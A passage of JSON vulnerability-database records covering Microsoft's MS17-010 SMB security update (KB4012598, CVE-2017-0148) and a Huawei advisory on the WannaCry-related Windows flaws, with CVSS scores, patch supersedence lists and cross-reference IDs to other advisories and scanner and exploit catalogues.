Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-15T18:18:24", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-15T18:18:24", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-09-15T18:18:24", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB2536275", "KB957095", "KB923414", "KB3177186", "KB3073921", "KB917159", "KB2508429", "KB3130896", "KB982214", "KB971468"], "parentseeds": ["KB4601360", "KB4577064", "KB5000844", "KB5001389", "KB4520002", "KB4507452", "KB5005090", "KB4541506", "KB4516026", "KB5004955", "KB5003210", "KB5005606", "KB5003661", "KB4525234", "KB4493471", "KB4487023", "KB4489880", "KB4018466", "KB4512476", "KB4537810", "KB4556860", "KB5004305", "KB4503273", "KB4486465", "KB4592498", "KB4530695", "KB4550951", "KB4598288", "KB4561670", "KB4534303", "KB4571730", "KB4580378", "KB4487019", "KB4056759", "KB4565536", "KB4489876", "KB4499149", "KB4586807"], "msproducts": ["9344", "9312", "9311", "10287", "9316", "4393", "9318"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-09-15T18:18:24", "differentElements": ["parentseeds"], "edition": 10}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "2a53a48f8a315156d34ae1453584e475", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-14T14:15:28", "history": [], "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-14T14:15:28", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-10-14T14:15:28", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB3073921", "KB982214", "KB3130896", "KB3177186", "KB2508429", "KB958687", "KB923414", "KB957095", "KB917159", "KB971468", "KB2536275"], "parentseeds": ["KB4056759", "KB4503273", "KB4489876", "KB4556860", "KB4565536", "KB4601360", "KB5001389", "KB4486465", "KB4586807", "KB4580378", "KB4525234", "KB4516026", "KB4499149", "KB4487019", "KB4541506", "KB5003661", "KB4598288", "KB4577064", "KB4571730", "KB4561670", "KB5004955", "KB4487023", "KB4520002", "KB5005090", "KB4530695", "KB5005606", "KB4512476", "KB4550951", "KB4537810", "KB4489880", "KB4534303", "KB5003210", "KB5006736", "KB5004305", "KB4507452", "KB5000844", "KB4493471", "KB4018466", "KB4592498"], "msproducts": ["4393", "9318", "9312", "10287", "9311", "9344", "9316"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-10-14T14:15:28", "differentElements": ["parentseeds"], "edition": 11}], "viewCount": 87, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-11-12T13:08:44", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-11-12T13:08:44", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB923414", "KB917159", "KB3130896", "KB3073921", "KB2536275", "KB3177186", "KB971468", "KB957095", "KB2508429", "KB982214"], "parentseeds": ["KB4530695", "KB5003210", "KB4571730", "KB4537810", "KB5004955", "KB4489880", "KB5005090", "KB4598288", "KB4512476", "KB4489876", "KB4507452", "KB4592498", "KB4565536", "KB4486465", "KB4520002", "KB5005606", "KB5004305", "KB4550951", "KB4493471", "KB5006736", "KB4534303", "KB4056759", "KB4556860", "KB5000844", "KB4561670", "KB4499149", "KB4487019", "KB4541506", "KB4516026", "KB4601360", "KB4525234", "KB5007263", "KB4580378", "KB5001389", "KB5003661", "KB4577064", "KB4487023", "KB4503273", "KB4586807", "KB4018466"], "msproducts": ["10287", "9344", "4393", "9318", "9316", "9311", "9312"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": [], "_object_type": "robots.models.microsoftKB.MicrosoftKBBulletin", "_object_types": ["robots.models.microsoftKB.MicrosoftKBBulletin", "robots.models.base.Bulletin"]}], "huawei": [{"id": "HUAWEI-SA-20170513-01-WINDOWS", "bulletinFamily": "software", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "published": "2017-05-13T00:00:00", "modified": "2017-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "reporter": "Huawei Technologies", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "huawei", "lastseen": "2021-06-08T18:44:26", "history": [{"bulletin": {"affectedSoftware": [{"name": "\u25cfCH242", "operator": "eq", "version": "\u25cfRH2268 V2"}, {"name": "\u25cfCH220", "operator": "eq", "version": "\u25cfN2000 Appliance"}, {"name": "\u25cfCH222", "operator": "eq", "version": "\u25cfRH1288A V2"}, {"name": "18800F", "operator": "eq", "version": "V100R001"}, {"name": "\u25cfCH242 V3", "operator": "eq", "version": "\u25cfRH2285"}, {"name": "\u25cfES3000", "operator": "eq", "version": ""}, {"name": "\u25cfCH121", "operator": "eq", "version": "\u25cfiNIC"}, {"name": "\u25cfCH140", "operator": "eq", "version": "\u25cfL2800"}, {"name": "\u25cfE6000 Chassis", "operator": "eq", "version": "\u25cfRH2285H V2"}, {"name": "\u25cfBigdata Appliance", "operator": "eq", "version": "\u25cfHuawei solutions for SAP HANA"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfBH620 V2", "operator": "eq", "version": "\u25cfFusionAccess"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C00"}, {"name": "Product Name", "operator": "eq", "version": "Affected Version"}, {"name": "\u25cfeLog", "operator": "eq", "version": "\u25cfRH2288 V2"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C10"}, {"name": "\u25cfCH221", "operator": "eq", "version": "\u25cfRH1288 V2"}, {"name": "\u25cfBH640 V2", "operator": "eq", "version": "\u25cfHertz-W29"}, {"name": "\u25cfBH622 V2", "operator": "eq", "version": "\u25cfHertz-W19"}, {"name": "OceanStor18500", "operator": "eq", "version": "V100R001"}, {"name": "18800V3", "operator": "eq", "version": "V300R003C20"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C00"}, {"name": "\u25cfE6000", "operator": "eq", "version": "\u25cfRH2285 V2"}, {"name": "OceanStor18500V3", "operator": "eq", "version": "V300R003C20"}, {"name": "\u25cfCH240", "operator": "eq", "version": "\u25cfRH2265 V2"}, {"name": "\u25cfBH621 V2", "operator": "eq", "version": "\u25cfHertz-W09"}, {"name": "18800", "operator": "eq", "version": "V100R001"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-02-01T18:01:51", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2019-02-01T18:01:51", "rev": 2, "value": 6.1, "vector": "NONE"}}, "hash": "f60ec08b1e57c600c64d00418f03477296d59b1927c90693e0665c4a2d06a81d", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ab4c23e37edfd222606da2fa8131cc0e", "key": "description"}, {"hash": "1fe6f9c53ed1ec89833f87f45ee6db6f", "key": "reporter"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b027d2174bf77e8383f5629e4d766f25", "key": "title"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "8a3528e96f0013a96dd7340c6e13454e", "key": "affectedSoftware"}, {"hash": "8951f897adb3ace87288f35228ad9ab7", "key": "href"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}, {"hash": "c1aafc7e23f24ba11aae492f5caa2d97", "key": "type"}, {"hash": "7087ee65c2383d964726bbf1465730fc", "key": "published"}], "history": [], "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170513-01-windows-en", "id": "HUAWEI-SA-20170513-01-WINDOWS", "immutableFields": [], "lastseen": "2019-02-01T18:01:51", "modified": "2017-05-23T00:00:00", "objectVersion": "1.5", "published": "2017-05-13T00:00:00", "references": [], "reporter": "Huawei Technologies", "title": "Security Advisory - 'WannaCry ransomware' Vulnerabilities in Microsoft Windows Systems", "type": "huawei", "viewCount": 15}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-02-01T18:01:51"}, {"bulletin": {"bulletinFamily": "software", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-06-08T18:44:26", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", 